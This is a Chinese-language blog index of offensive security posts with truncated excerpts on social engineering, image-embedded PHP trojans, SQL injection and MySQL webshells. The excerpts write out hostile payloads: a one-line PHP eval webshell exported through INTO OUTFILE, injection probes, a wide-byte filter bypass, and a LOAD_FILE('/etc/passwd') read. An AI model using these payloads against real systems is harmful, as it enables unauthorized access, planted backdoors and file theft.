记一次简单的社工获取U盘文件

07月11日

简单说明一下:社工即社会工程学(Social Engineering,又被翻译为:社交工程学)在上世纪60年代左右作为正式的学科出现,广义 社会工程学的定义是:建立理论并通过利...

基于Windows下图片一句话木马制作

05月10日

So Easy 1、首先,在桌面新建一个文件夹 2、然后在其中放入一张图片文件yw.JPG和yw.php一句话木马 3、然后新建一个txt文档,修改后缀为bat执行文件,并在文档内写入D...

深入浅出SQL注入

03月26日

1.判断有无注入点 数字型:and 1=1 and 1=2 和 ‘ 字符型:’and ‘1’=’1? ‘and ‘1’=’2 搜索型:关键字%’ and 1=1 and ‘%’=’%??? 关键字%’ and 1=2 and ‘%’=’% 大部分数...

SQL注入-详细攻略

03月25日

‘ //单引号报错,转义 %bf%5c%27 //宽字节注入,数据库编码为GBK时,%bf%5c认为是一个字节,绕过PHP正则 UNION ALL SELECT LOAD_FILE(‘/etc/passwd’)– //读取系统...

MySQL-SQL语法总结

03月24日

1、建表格: create table table_name( column1 datatype [not null] [not null primary key], column2 datatype [not null], …); 说明: datatype –是资料的格式,...

MYSQL-简单的一句话木马

03月24日

  通过MySQL命令,INTO OUTFILE 执行导出数据,生成一句话木马在服务端,命令如下: 第一种: select ‘<?php @eval($_POST[pass]);?>’INTO ...

MySQL盲注-时间延迟

03月20日

sqlmap支持使用–Techniques “T”指定时间延迟注入,节省sqlmap使用其他注入测试时间, 然后就是伪静态指定位置注入,在注入参数中加*(不能去掉参数值),如果有token...

loading